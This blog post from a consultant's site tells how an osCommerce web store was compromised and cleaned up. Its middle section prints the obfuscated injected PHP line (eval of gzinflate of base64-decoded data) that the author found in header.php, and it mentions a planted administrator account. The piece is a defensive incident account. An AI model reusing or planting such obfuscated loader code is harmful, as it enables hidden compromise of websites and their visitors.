• Home
  • Insights
    • About Customer Insight
    • Ad Hoc Poll Results
    • Customer Insight
    • Green
    • Musings
    • Research Statistics
    • Top Performers
    • 495
    • RSS Feeds
  • Mobile UC
    • Mobile UC Business
    • Mobile UC Observations
    • Mobile UC Product Reviews
    • Mobile UC Service Reviews
    • Mobile UC Applications Reviews
    • Mobile UC Devices Reviews
  • Coms
    • IP Video
      • Video Conferencing Consultants
      • Telepresence Consultants
      • Video Conferencing Strategy
    • Applications
    • E911
    • Email
    • LANs & WANs
    • Messaging
    • Quality
    • Security
    • SIP
    • VoIP
    • VoIP History
  • Scores
  • Reports
    • Register?
      • Be Heard. Join our Panel.
      • Prize Winners Do Surveys
      • Unregister
    • Research Catalogs
    • Recovery Series
    • Collaboration
      • Exchange Review
    • Fundamentals
    • Messaging
    • Mobile UC
      • Alcatel-Lucent Users
      • Avaya Users
      • Cisco Users
      • Nortel Users
      • Product Manager's Guide
      • Siemens Users
    • Web 2.0
    • Pre-2007 Research
    • Comments
    • Brainshark Content Network
  • About
    • About Peter Brockmann
    • Contact Us
    • News
    • In the News...
    • Request a User Briefing
    • Request a Vendor Briefing
    • Full Disclosure Notice
    • Famous Brockmann's
  • David
Insights Musings Anatomy of an OS Commerce Attack

Anatomy of an OS Commerce Attack

Wednesday, 19 May 2010 16:25 Written by Peter Brockmann
User Rating: / 6
PoorBest 

Some Names Have Been Changed...

..but not all names. One of my web clients got hacked the other day. It was a sneaky, but fortunately mostly benign attack.

oscommerce-hacked1The client uses OS Commerce, the open source storefront and got a nasty fright when this nasty page - legitimate Google warning page - popped up. Clicking on the link to the Google Safe Browsing Diagnostic page gave a detailed report claiming how this client had affected lots of other domains with malware.

Now, this site was a legitimate Google site since the URL is clearly a Google domain. It claimed that the client's site had infected lots of other domains and was part of a nasty network. It gave instructions on how to overcome the malware state of the operation.

oscommerce-hacked2So, I took the precautionary step of validating that in fact the client site was infected, knowing full well that some hacks are simply nuisance hacks and just because it said that it was infected didn't mean that it was. Then, my first lucky break - Google said no it wasn't affected (below). That made me breathe a little easier.

oscommerce-hacked3

 

 

 

 

 

 

 

 

To Recap

Ok. So, the root page is firing up a legitimate Google warning page linking to a report of a malware page for a different url. When pushed, Google denies the site is infected.

Then, I looked at the source page of the root page, which of course, is dynamically generated by the php script. The offending cause of the nasty result is the yellow line. The bad code must be in the header.php script page since it is above the first table which is in the includes/language/english/index.php page.

oscommerce-hacked4

 

 

 

 

Then, we went to the header.php page and compared it with a clean backup (every site should have an active backup that can be easily referenced - we use Time Capsule with our Apple servers) where I found the following nasty code:

 

eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk
4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox
7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

 

and purged it from the header.php.

Then we discovered an alien user in the administrator database and removed them, changed passwords, recursively reset security on the site, added a sitemap and robots.txt file.

Hopefully that'll be the end of this attack.

< Prev   Next >

Comments  

 
0 #2 osCommerce One Page 2011-12-12 04:51
This is an excellent information over here. You have provided very valuable and useful information in this post.
Quote
 
 
0 #1 Ecommerce Web Design 2011-10-25 07:20
I really appreciate with the above information. Thanks for this interesting information.
Quote
 
Refresh comments list
RSS feed for comments to this post

Add comment


Security code
Refresh

Send
Cancel
JComments

2 times more small businesses use desktop video conferencing than room video conferences.

Related report: The Desktop Video Conferencing Experience

Login

  • Forgot your password?
  • Forgot your username?
Follow us on Twitter

Posts: All-Time Highest Rated

  • Why Register?
  • Guest Blog: Convincing Business Leaders About The Green Value of Their Low-Carbon Products
  • Internet on Us
  • 10 Most Popular Blog Entries of 2009
  • Brockmann Guest Blogs for No Jitter
  • Cisco Cius
  • Swatting Is a New Dangerous Sport
  • Identity Thieves Masquerade as Job Sites
  • Cost Saving Strategies: Why Video Managed Services?
  • Video Conferencing Consultants

Posts: Year's Most Popular

  • Why Register?
  • Mobile Apps Are Addictive
  • Now, I Have Seen It All
  • Taxes and Telecommuting
  • Breaking News - Avaya to IPO
  • Android Users Suffer Security Problems
  • Google Removes More Mal-Apps
  • Innovations in Screen Technologies
  • Applying Email Marketing Features to Personal Email
  • NFL Season Predictions

Reports: All-Time Most Popular

  • Forums in Small Companies
  • Forums in Large Companies
  • The Problem With Email
  • Video Communications 2.0: Tips for Improving The Experience
  • The Manager's Recession Survival Guide video

Reports: Year's Most Popular

(c) Brockmann & Company 2002-2011 Scroll To Top